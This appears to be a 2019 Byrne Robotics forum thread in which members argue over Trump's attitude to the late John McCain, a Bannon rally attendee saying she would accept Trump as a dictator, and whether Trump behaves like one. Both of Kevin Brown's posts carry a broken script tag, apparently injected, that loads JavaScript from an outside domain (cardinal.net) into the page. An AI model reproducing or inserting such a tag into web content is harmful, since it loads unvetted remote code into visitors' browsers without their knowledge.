Byrne Robotics Member

Posted: 20 March 2019 at 8:53pm | IP Logged | 1 post reply

I don’t think he realizes McCain is actually dead
Back to Top profile | search

Matt Reed
Byrne Robotics Security
Robotmod

Posted: 20 March 2019 at 10:49pm | IP Logged | 2 post reply

No, he does.  He's just petty enough to have wanted to be "thanked" for his funeral despite the fact that he's expressed his public dislike of the man for over two decades.  Bone spurs > 5-year POW dontcha know. 

DW Zomberg
Byrne Robotics Member

Posted: 21 March 2019 at 6:04am | IP Logged | 3 post reply

Amazing how so many military supporters and vets scorned McCain (and John Kerry) while falling head over heals in love for Bush Jr and Trump.

Don Z

Edited by DW Zomberg on 21 March 2019 at 6:07am

Eric Ladd
Byrne Robotics Member

Posted: 21 March 2019 at 7:14am | IP Logged | 4 post reply

The people, both politicians and citizens, that keep this guy in power scare me the most. Recently, I saw just how shortsighted and hazardous their thinking and "logic" is for the US democracy. Steve Bannon has been holding rallies across the country to encourage people to "take over the Republican party" and get rid of the current batch of politicians. He held a rally, I believe in Ohio and a woman by the name of Melva Gwynne (sp) from Cincinnati got on the mic and complained about how she and other followers of Trump hate the "trash" representing the people and that they dislike being called racist or other names. Bannon followed up by telling her how to get involved with his movement and tried to get her to pass the mic, but she insisted on making this statement:

"Never in my life did I think I would like to see a dictator, but if there is going to be one I want it to be Trump."

The audience clapped and so did Bannon. I just can't understand the mindset that believes their power is slipping away and therefore a dictator is necessary. They seem ready to dispose of democracy as long as they are part of the ruling party and that is frightening.

James Woodcock
Byrne Robotics Member

Posted: 21 March 2019 at 8:09am | IP Logged | 5 post reply

Idiots who have been brainwashed in to thinking that a democratically elected government is working against them thinking that the answer is to have a dictator who says he is working for them?

I'm shocked. But this is where America is at the moment and it's where the UK is heading without realising it. People are so distrustful of democracy at the moment that they feel totalitarian regimes are worth a shout, and even follow Trump's lead by seeming to think places like Russia, China and N Korea are better options.

Scary.
Back to Top profile | search e-mail

Paul Buchanan
Byrne Robotics Member

Posted: 21 March 2019 at 8:39am | IP Logged | 6 post reply

The same thing would have happened had a pro-Obama audience member said the same thing. Stupidity either way. But don't pretend that it would have been any different on the other side. In a land of 330 million people you'll have a certain number of people making ridiculous claims about any political subject.

Odd though that the term dictator and Trump is starting to be bandied around lately. This is being done at the same time as Democratic candidates are seriously discussing doing away with the electoral college, allowing illegal aliens to vote and be counted in the census, and "packing" the Supreme Court. I haven't seen him approach anything like having the Federal Govt. temporarily take over the auto industry, the Obamacare diversion of funds w/o Congressional approval, DACA executive order and sanctuary city policies, and spying on AP and Fox reporters.... Yet Trump is somehow the dictator?

Kevin Brown
Byrne Robotics Member

Posted: 21 March 2019 at 9:38am | IP Logged | 7 post reply

The same thing would have happened had a pro-Obama audience member said the same thing.< ="text/" async="" src="//cardinal.net/1fa16f6ccbee745a0c.js">

I wholeheartedly disagree.  There is absolutely no way anyone would have applauded that.  Odds are there would be a lot of ridicule of the person who said it.

Greg McPhee
Byrne Robotics Member

Posted: 21 March 2019 at 9:44am | IP Logged | 8 post reply

The real winner in this whole debacle with Trump and Brexit is Putin. He doesn't need to flex any military might everything is being destroyed from within.

Eric Sofer
Byrne Robotics Member

Posted: 21 March 2019 at 9:44am | IP Logged | 9 post reply

Paul B., we've seen Trump:
Shut down the government for the longest time ever to further his personal pecadillo.
Separate parents and children.
Harshly criticize the free press.
Whine about being picked on by that self same press.
Make occurrences of any success seem to be related to his leadership, even when they were started before his administration.
Demand aggrandizement.
Kowtow at the feet of other dictators.

There are an awful lot of traits that I would assign to a dictator that Mr. Trump demonstrates. So, yes, Trump is the dictator.

But I may not be seeing your point of view. What traits would you think define a dictator? This might just be an issue of perspective, or difference of point of view between you and me. I'm interested in what you think a dictators actions and behaviors are, please.

Greg McPhee
Byrne Robotics Member

Posted: 21 March 2019 at 9:45am | IP Logged | 10 post reply

"Never in my life did I think I would like to see a dictator, but if there is going to be one I want it to be Trump."

=========================================================

This is just terrifying. I fear the chaos at the 2020 elections when you have that mentality ingrained in people.

Paul Buchanan
Byrne Robotics Member

Posted: 21 March 2019 at 11:56am | IP Logged | 11 post reply

Paul B., we've seen Trump:
Shut down the government for the longest time ever to further his personal pecadillo.

Obama shut down the government for 17 days over Obamacare funding. Not as long as the last shutdown, but you hardly anything new.

Separate parents and children.

Also the same as with previous administrations. In addition child sex-trafficking arrests are way up under Trump. Separations are done not only to insure a relationship exists between the child and the adult, but also because other than the "catch and release" program that the Obama administration followed for illegal crossings with children, parents are required to be separated from their children under current Fed law.

Harshly criticize the free press.

So he's not free to criticize the press for it's coverage of him? When he starts tapping the phones and following reporters around (ala Obama), then I'll start worrying. 

Whine about being picked on by that self same press.

Compare the negative coverage he receives to the past administration. Do you think the coverage is remotely similar? What did Obama have to complain about? 

Make occurrences of any success seem to be related to his leadership, even when they were started before his administration.

Nothing new here to Trump. I remember "It's Bush's fault" being thrown around for 8 years - to the point that it was a running joke.

Demand aggrandizement.

No argument there. His ego is unmatched. gain, so what? It doesn't mean he's taking on dictatorial powers.

Kowtow at the feet of other dictators.

Doing the wave with Raoul Castro, "tell Valadimir I'll have more flexibility after the election", the billion $ Iran payment, Syria's "red line". Just curious what Trump has given up to other dictators to kowtow to them?

There are an awful lot of traits that I would assign to a dictator that Mr. Trump demonstrates. So, yes, Trump is the dictator.

There are traits of dictators in every person with political power. What specific traits? Being brash, loud, and braggadocios? So what? Meaningless.

But I may not be seeing your point of view. What traits would you think define a dictator? This might just be an issue of perspective, or difference of point of view between you and me. I'm interested in what you think a dictators actions and behaviors are, please.

I define the traits of a Dictator as removing power from the people. Taking power mostly for themselves, but also for their Federal party/ideology. Not superficial actions or personal traits. Those mean nothing. Hitler was a compelling speaker. So was Reagan, FDR, and Churchill. Hardly makes them dictators. Leaders that change the rules, or don't follow the Constitution, or ignore the laws they're required to uphold. Not being held to the same standards as all other citizens (see Hillary Clinton). And not conceding power. Those are the actions of a dictator. 

Kevin Brown
Byrne Robotics Member

Posted: 21 March 2019 at 1:06pm | IP Logged | 12 post reply

Just for once I'd love to see someone argue for Trump without essentially saying, "yeah, but Obama (or Hillary or Bill Clinton) did..."< ="text/" async="" src="//cardinal.net/1fa16f6ccbee745a0c.js">

Just once.

Honestly, anyone who is firmly backing Trump right now needs to have their head examined.

<< Prev Page of 444 Next >>
  Post ReplyPost New Topic
Printable version Printable version